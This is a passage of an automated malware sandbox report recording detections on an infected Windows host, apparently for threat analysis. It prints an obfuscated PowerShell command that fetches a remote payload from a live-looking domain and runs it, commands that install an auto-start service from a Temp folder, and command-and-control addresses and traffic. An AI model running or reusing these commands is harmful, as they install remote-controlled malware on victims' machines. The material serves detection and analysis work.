-NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4484, ParentProcessName: cmd.exe, ProcessCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ProcessId: 1276, ProcessName: powershell.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1276, TargetFilename: C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline
        Sigma detected: Net.exe Execution
        Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6444, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 2268, ProcessName: net.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6444, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 5504, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , CommandLine|base64offset|contains: >E(^,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4484, ParentProcessName: cmd.exe, ProcessCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ProcessId: 1276, ProcessName: powershell.exe
        Sigma detected: SC.EXE Query Execution
        Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9908, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 10004, ProcessName: sc.exe
        Sigma detected: Start Windows Service Via Net.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6444, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 2268, ProcessName: net.exe

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoweRSheLL -W hiddEN -NoLOgo -NOp -Ep byPaSS -eNCOdEDcoMmANd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA==" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wr03xjs0\wr03xjs0.cmdline", ProcessId: 2636, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T11:11:16.434331+010020283713Unknown Traffic192.168.11.304978523.44.201.7443TCP
        2024-11-08T11:12:19.867996+010020283713Unknown Traffic192.168.11.304978823.209.72.32443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T11:11:59.050211+010028033053Unknown Traffic192.168.11.3049786172.67.137.62443TCP
        2024-11-08T11:12:41.905355+010028033053Unknown Traffic192.168.11.3049792172.67.137.62443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T11:10:33.123722+010028032742Potentially Bad Traffic192.168.11.3049761172.67.137.62443TCP
        2024-11-08T11:10:35.359697+010028032742Potentially Bad Traffic192.168.11.3049763172.67.137.62443TCP
        2024-11-08T11:10:37.503057+010028032742Potentially Bad Traffic192.168.11.3049765172.67.137.62443TCP
        2024-11-08T11:11:00.759066+010028032742Potentially Bad Traffic192.168.11.3049779172.67.137.62443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 15%
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49786 version: TLS 1.2
        Source: Binary string: .Automation.pdbdb source: powershell.exe, 0000000A.00000002.3779190095.000002AE6691F000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\FXSTIFFDebugLogFile.txt
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\EDGEMITMP_D24C8.tmp
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\FXSAPIDebugLogFile.txt
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY\config.cfg
        Source: C:\Windows\Temp\myRdpService.exeFile opened: C:\Windows\Temp\GPlNquydeJZUlDGbzOFUAwPY\NULL

        Networking

        barindex
        Potential dropper URLs found in powershell memory
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5EE7C000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49791
        Source: global trafficTCP traffic: 192.168.11.30:49789 -> 23.88.71.29:8000
        Source: global trafficTCP traffic: 192.168.11.30:49790 -> 206.206.126.252:8008
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/64 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/59 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 7FFbF1a9LE6s2rh/7oiJ1A==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: Gp+0/Cu8Ek6hn/4v2BFh5g==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: C0g8OClejEe5E7Qdk4mqPg==Sec-WebSocket-Version: 13
        Source: Joe Sandbox ViewIP Address: 172.67.137.62 172.67.137.62
        Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49785 -> 23.44.201.7:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:49788 -> 23.209.72.32:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49765 -> 172.67.137.62:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49761 -> 172.67.137.62:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49779 -> 172.67.137.62:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49763 -> 172.67.137.62:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49786 -> 172.67.137.62:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49792 -> 172.67.137.62:443
        Source: global trafficHTTP traffic detected: GET /sybpc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cc173312a2d5575f38f6acb98aba110ba056b63fe90668a9e4cd59e6c092e5e18fb8b8070924e6c51b4fcf8eda4fa0ed74b393d0d70927b6997b6ba5903a852/Windows%20Defender/16/16/user/204 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad689e35a3c9c5c0db73ce703e8 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: GET /file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2b1d9df4d61425f4f3265d2ed6dd59d98ea5986f45ac87d0d6d6cc34b8132c20d03c81e994427de6fa0a00d9dad087cf427cb41294857e34f691ad6220a02daeda5b2881e8d53cf9b2b7b5bffebebda HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00cfed1263e3ebfcf33acd7e0e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: GET /file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85a7865658ff32ffa28c43f34e9f7b5c99dc12e70151602607e49269e25e548ff56b345bf7f9f9aafc5e37381b67bdcf26a917cd5c806adb42ab90c71b564ba17f10abcf18115f342c6e1065c1e853af HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 85
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 86
        Source: global trafficHTTP traffic detected: GET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b543072600841d338722d8be39e0fbed7d8f360f490a597da48fdbe0b3c26e45bedad6338962586c553b7cf7f7fc173c2a7dc525b9d1b673338dc56e13d8e74d8544e3a61b2c33131f73315a439626d3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fcc8d19123b48461b1b5d1cd9e HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 62
        Source: global trafficHTTP traffic detected: GET /file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229f8d5ac1df1afd229806593a24a07475c330ced357e5b62ca14794fc90cf9b5b18130bb75e02c6ba1e793807fb6a969dd58fac8a5f2f62a9469dc681627f3d76f41fb2548f810a2297e414d6c9ab966 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 140
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 69
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4caaca811f3fa61268d807a76d0dd5d4112cfa6ad3e7314c91843f2cea3c900100c4cf95939e2af05452bbe95d756961d6e14e2026cebcf6a859fdcef1cd21d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 200
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 97
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f19dfb6c9d84850b111e90ce50 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 64
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 104.77.220.172
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /sybpc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3cc173312a2d5575f38f6acb98aba110ba056b63fe90668a9e4cd59e6c092e5e18fb8b8070924e6c51b4fcf8eda4fa0ed74b393d0d70927b6997b6ba5903a852/Windows%20Defender/16/16/user/204 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
